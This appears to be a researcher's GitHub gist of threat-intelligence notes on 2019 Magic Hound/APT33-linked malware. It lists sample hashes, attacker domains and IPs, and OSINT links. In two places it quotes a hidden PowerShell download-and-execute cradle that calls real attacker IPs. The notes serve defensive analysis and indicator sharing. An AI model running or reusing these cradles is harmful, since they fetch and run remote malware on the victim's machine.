Created
July 2, 2019 20:17
-
-
Save Blevene/3390bef46eaaa684f1b345c5b88c3d0d to your computer and use it in GitHub Desktop.
Cyber July 2nd 2019 Quick Notes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CyberCom | |
https://twitter.com/CNMF_VirusAlert/status/1146130046127681536 | |
https://twitter.com/CNMF_VirusAlert/status/1146130046127681536 | |
https://customermgmt.net/page/macrocosm - 37.220.6.115 (AS 20860 (Iomart Cloud Services Limited)) | |
b09bce085a2bbc1c0498baf3f75b48f8c86db132ebfc64d72b300f47b7435e89 - Powermet , 2017-01-14 03:35Z | |
> Source Doc: 528714aaaa4a083e72599c32c18aa146db503eee80da236b20aea11aa43bdf62 | |
> Powershell: http://69.87.223.26:8080/eiloShaegae1 | |
> "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://69.87.223.26:8080/eiloShaegae1')" | |
>Payload: PUPY, 924b4615ba6e6ed87fad81ad4c2ae876d10a9b34fb347210a2ec7621b92005cb | |
> OSINT: https://www.netscout.com/blog/asert/additional-insights-shamoon2 | |
f2bf20e7bb482d27da8f19aa0f8bd4927746a65300929b99166867074a38a4b4 - ASPX Webshell | |
28ebfe86217ed36ead5b429cadcd005338a0ae6207119729b53698b5e4a3ef3f - Powermet, 2017-01-06 16:50Z | |
> http://139.59.46.154:3485/eiloShaegae1 | |
> "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://139.59.46.154:3485/eiloShaegae1')" | |
> Intermediate stage Downloader: http://139.49.46.154:3485/IMo8oosieVai | |
> Downloader for PuPy | |
> OSINT: https://securityintelligence.com/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks/ | |
0515cd2ba84a5da10c63cadae06f04d778d66c054b9184edb57be6ea95a1095b - JSP Code Injector | |
dc546dc992b31b3927e63cefbfd2716ca016ca238f6142cf16e27b240b0d7bb9 - File Uploader |
Interesting tweets from friends:
https://twitter.com/obiwanblee/status/1146152208976584704
Associated sample is fdae4a166decf212ef9429a4fb95c60e
which is consistent with the use of the tool RULER. Related binary (2c0ade3a01d6318861d54ce94faca006) is an AutoIT executable likely used to download additional tools from hxxps://customermgmt[.]net/page/news #apt33
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Activity falls under "magichound" https://unit42.paloaltonetworks.com/unit42-magic-hound-campaign-attacks-saudi-targets/
There is some contention as to whether this actor fits into APT33 or not.